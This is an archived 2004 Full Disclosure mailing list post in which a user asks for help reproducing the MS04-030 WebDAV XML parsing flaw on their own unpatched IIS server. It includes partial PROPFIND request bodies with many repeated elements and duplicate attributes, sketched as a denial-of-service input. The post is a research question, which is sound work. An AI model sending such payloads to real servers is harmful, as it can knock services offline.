Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: MS04-030 WebDAV XML Parsing - Need Details
From: nirvana <karmic_nirvana () yahoo com>
Date: Wed, 13 Oct 2004 10:51:59 -0700 (PDT)

I tried attributes in a single tag too, like...

<x:elem x:attr="value" x:attr="value" x:attr="value"
x:attr="value" x:attr="value"...........so on />


--- nirvana <karmic_nirvana () yahoo com> wrote:

Hi List,
I've been trying to reproduce this vulnerability
(MS04-030) on my unpatched IIS. I am sending a
request
with a element which has multiple/many attributes.
With my limited knowlegde of WebDAV, I think the
attributes per-element can be sent in two ways 
1.in one line, in the element tag only 
2.in multiple per attribute tags.

The request I am sending is something like this (XML
Data only from a PROPFIND Request, with multiple
tags)...

<?xml version="1.0" encoding="utf-8" ?>
<D:propfind xmlns:D="DAV:">
  <D:prop xmlns:ns="DAV:"><ns:displayname/>
    <ns:displayname>
    <attrib1>a</attrib1>
    <attrib1>a</attrib1>
.
.
.
.
    <attrib1>a</attrib1>
  </ns:displayname>
  </D:prop>
</D:propfind>



Plz feel free to rant me if I doin wrong :).

Thanks.






              
__________________________________
Do you Yahoo!?
Read only the mail you want - Yahoo! Mail SpamGuard.
http://promotions.yahoo.com/new_mail 

_______________________________________________
Full-Disclosure - We believe in it.
Charter:
http://lists.netsys.com/full-disclosure-charter.html



__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault